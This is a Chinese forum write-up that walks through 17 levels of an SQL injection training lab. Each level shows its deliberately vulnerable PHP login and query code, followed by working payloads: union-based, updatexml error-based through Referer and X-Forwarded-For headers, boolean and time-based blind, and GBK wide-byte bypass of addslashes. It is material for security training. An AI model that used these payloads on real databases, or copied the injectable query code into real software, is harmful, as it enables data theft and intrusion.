本文为看雪论坛优秀文章
看雪论坛作者ID:孤桜懶契
1
pass-01
$username = '';$password = '';@$id = $_GET['id'];@$sql = 'select *from user where id='.$id;mysqli_select_db($conn,'****');// 不想让你们知道库名$result = mysqli_query($conn,$sql);while ($row = mysqli_fetch_array($result)){$username = $row['username'];$password = $row['password'];}echo 'Your Login name:'.$username;echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(column_name) from f.columns where table_schema=database() and table_name=0x6572726f725f666c6167;//0x6572726f725f666c6167是error_flag的十六进制
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,flag from error_flag;2
pass-02
$username = '';$password = '';@$id = $_GET['id'];@$sql = 'select *from user where id='\''.$id.'\'';mysqli_select_db($conn,'****');// 不想让你们知道库名$result = mysqli_query($conn,$sql);while ($row = mysqli_fetch_array($result)){$username = $row['username'];$password = $row['password'];}echo 'Your Login name:'.$username;echo 'Your Password:'.$password;
给id传参加了个单引号,和上题一样的做法差不多,就是1后面加个'来闭合源代码中的单引号,再加个#号url编码也就是%23注释掉后面的单引号,也就可以联合查询了。
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union all select 1,2,flag from error_flag %23;3
pass-03
sername = '';$password = '';@$id = $_GET['id'];@$sql = 'select *from user where id='(\''.$id.'\')';mysqli_select_db($conn,'****');// 不想让你们知道库名$result = mysqli_query($conn,$sql);while ($row = mysqli_fetch_array($result)){$username = $row['username'];$password = $row['password'];}echo 'Your Login name:'.$username;echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-03/index.php?id=1') union all select 1,2,flag from error_flag %23;4
pass-04
$username = '';$password = '';@$id = $_GET['id'];@$sql = 'select *from user where id=("'.$id.'")';mysqli_select_db($conn,'****');// 不想让你们知道库名$result = mysqli_query($conn,$sql);while ($row = mysqli_fetch_array($result)){$username = $row['username'];$password = $row['password'];}echo 'Your Login name:'.$username;echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-04/index.php?id=1") union all select 1,2,flag from error_flag %23;5
pass-05
$username = $_POST['username'];$password = $_POST['password'];$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';mysqli_select_db($conn,'******'); //不想告诉你们库名$result = mysqli_query($conn,$sql);$row = mysqli_fetch_array($result);$uname = $row['username'];$passwd = $row['password'];if($row){echo '成功登录Your Login name:'.$uname.'Your Password:'.$passwd.'';}else{echo '账号密码错误';}
用Hackbard的post注入,找到回显点:
username=admin&password=as4dsa2dsad2a3' union all select 1,2,3 limit 1,1#表:
username=admin&password=as4dsa2dsad2a3' union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1#字段:
username=admin&password=as4dsa2dsad2a3' union all select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag' limit 1,1#拿flag:
username=admin&password=as4dsa2dsad2a3' union all select 1,2,flag from flag limit 1,1#6
pass-06
$username = $_POST['username'];$password = $_POST['password'];$sql = 'select *from user where username =("'.$username.'") and password=("'.$password.'")';mysqli_select_db($conn,'******'); //不想告诉你们库名$result = mysqli_query($conn,$sql);$row = mysqli_fetch_array($result);$uname = $row['username'];$passwd = $row['password'];if($row){echo '成功登录Your Login name:'.$uname.'Your Password:'.$passwd.'';}else{echo '账号密码错误';}
双引号后面加个括号。
username=admin&password=as4dsa2dsad2a3") union all select 1,2,flag from flag limit 1,1#7
pass-07
拼接一个完整的insert 并且在其中写一个updatexml报错注入。
'or updatexml(1,concat(0x7e,user()),1),1)#取表:
'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1)#取字段和flag:
'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag_head')),1),1)#'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#8
pass-08
$username = $_POST['username'];$password = $_POST['password'];$uagent = $_SERVER['HTTP_REFERER'];$jc = $username.$password;$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}mysqli_select_db($conn,'****');//不想告诉你库名$result = mysqli_query($conn,$sql);$row = mysqli_fetch_array($result);$uname = $row['username'];$passwd = $row['password'];if($row){$Insql = "INSERT INTO refer (`refer`,`username`) VALUES ('$uagent','$uname')";$result1 = mysqli_query($conn,$Insql);print_r(mysqli_error($conn));echo '成功登录';
Referer: 'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#9
pass-09
function getip(){if (getenv('HTTP_CLIENT_IP')){$ip = getenv('HTTP_CLIENT_IP');}elseif (getenv('HTTP_X_FORWARDED_FOR')){$ip = getenv('HTTP_X_FORWARDED_FOR');}elseif (getenv('HTTP_X_FORWARDED')){$ip = getenv('HTTP_X_FORWARDED');}elseif (getenv('HTTP_FORWARDED_FOR')){$ip = getenv('HTTP_FORWARDED_FOR');}elseif (getenv('HTTP_FORWARDED')){$ip = getenv('HTTP_FORWARDED');}else{$ip = $_SERVER['REMOTE_ADDR'];}return $ip;}$username = $_POST['username'];$password = $_POST['password'];$ip = getip();$jc = $username.$password;$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}mysqli_select_db($conn,'****');//不想告诉你库名$result = mysqli_query($conn,$sql);$row = mysqli_fetch_array($result);$uname = $row['username'];$passwd = $row['password'];if($row){$Insql = "INSERT INTO ip (`ip`,`username`) VALUES ('$ip','$uname')";$result1 = mysqli_query($conn,$Insql);print_r(mysqli_error($conn));echo '成功登录';
X-FORWARDED-FOR: 'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#10
pass-10
$news ='';@$id = $_GET['id'];@$sql = 'select *from news where id='.$id;mysqli_select_db($conn,'****');// 不想让你们知道库名$result = mysqli_query($conn,$sql);while ($row = mysqli_fetch_array($result)){$news = $row['news'];}if($news!== ''){echo '有数据';}
length函数:
我拿起手中的burp来跑起,12字符快。
按从1到12的顺序把ascii码写下来准备解码。
107 97 110 119 111 108 111 110 103 120 105 97了解原理就好了,对于我来说还是sqlmap好用,暂时python脚本还不太会写。
11
pass-11
$news ='';@$id = $_GET['id'];@$sql = 'select *from news where id="'.$id.'"';mysqli_select_db($conn,'****');// 不想让你们知道库名$result = mysqli_query($conn,$sql);while ($row = mysqli_fetch_array($result)){$news = $row['news'];}if($news!== ''){echo '有数据';}
原理和上题一模一样就是需要加个单引号和末尾加个注释符%23也就是#。
12
pass-12
$username = $_POST['username'];$password = $_POST['password'];$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';mysqli_select_db($conn,'******'); //不想告诉你们库名$result = mysqli_query($conn,$sql);$row = mysqli_fetch_array($result);$uname = $row['username'];$passwd = $row['password'];if($row){echo '成功登录';}else{echo '账号密码错误';}
换了个传参方式,但是原理不变。
13
pass-13
$news ='';@$id = $_GET['id'];@$sql = 'select *from news where id="'.$id.'"';mysqli_select_db($conn,'****');// 不想让你们知道库名$result = mysqli_query($conn,$sql);while ($row = mysqli_fetch_array($result)){$news = $row['news'];}echo '有数据';
(1) if(条件,满足条件的返回,不满足田间的返回)
(2) sleep(X):休眠X秒
判断数据库的值用substr和ascii。
1" and if(ascii(substr(database(),1,1))>1,sleep(1),1)%2314
pass-14
$news ='';@$id = $_GET['id'];@$sql = 'select *from news where id=(\''.$id.'\')';mysqli_select_db($conn,'****');// 不想让你们知道库名$result = mysqli_query($conn,$sql);while ($row = mysqli_fetch_array($result)){$news = $row['news'];}echo '有数据';
http://inject2.lab.aqlab.cn:81/Pass-14/index.php?id=1') and if(ascii(substr(database(),1,1))>1,sleep(5),1)%2315
pass-15
$username = '';$password = '';@$id = addslashes($_GET['id']);@$sql = 'select *from user where id=\''.$id.'\'';mysqli_select_db($conn,'****');// 不想让你们知道库名mysqli_query($conn,"SET NAMES gbk");$result = mysqli_query($conn,$sql);while ($row = mysqli_fetch_array($result)){$username = $row['username'];$password = $row['password'];}echo 'Your Login name:'.$username;echo 'Your Password:'.$password;
可以发现有addslashes函数导致我们输入的一些单双引号前面加了个右斜线\,由于右斜线的url编码是%5c,%df%5c会组成一个特殊汉字来进行逃逸。
接着判断字段长度、等拿flag和第一题一样:
http://inject2.lab.aqlab.cn:81/Pass-15/index.php?id=1%df' union all select 1,2,3%2316
pass-16
$username = '';$password = '';@$id = addslashes($_GET['id']);@$sql = 'select *from user where id=("'.$id.'")';mysqli_select_db($conn,'****');// 不想让你们知道库名mysqli_query($conn,"SET NAMES gbk");$result = mysqli_query($conn,$sql);while ($row = mysqli_fetch_array($result)){$username = $row['username'];$password = $row['password'];}echo 'Your Login name:'.$username;echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-16/index.php?id=1%df") union all select 1,2,3%2317
pass-17
$username = addslashes($_POST['username']);$password = addslashes($_POST['password']);$sql = 'select *from user where username =(\''.$username.'\') and password=(\''.$password.'\')';mysqli_select_db($conn,'******'); //不想告诉你们库名mysqli_query($conn,"SET NAMES gbk");$result = mysqli_query($conn,$sql);$row = mysqli_fetch_array($result);if($row){echo '成功登录';}else{echo '账号密码错误';}
因为是盲注所以嘿嘿,抓包,存123.txt,注意:一定要抓我们自己成功构造登陆的形式加*来让sqlmap跑,不然可能跑不出来。
看雪ID:孤桜懶契
https://bbs.pediy.com/user-home-922735.htm
# 往期推荐
1. Cisco RV160W系列路由器漏洞:从1day分析到0day挖掘
2. 从SSL库的内存漫游开发dump自定义客户端证书的通杀脚本
3. Avast、AVG、Avira三A合一,诺顿正式发起要约收购Avast
球分享
球点赞
球在看
点击“阅读原文”,了解更多!
文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458391445&idx=2&sn=5d417c0661b53811a4bef392face531c&chksm=b18f231f86f8aa09d6132f8af1b2abc6b106ce23fcecc979154f4a7f7252e29574fe85d53e97#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh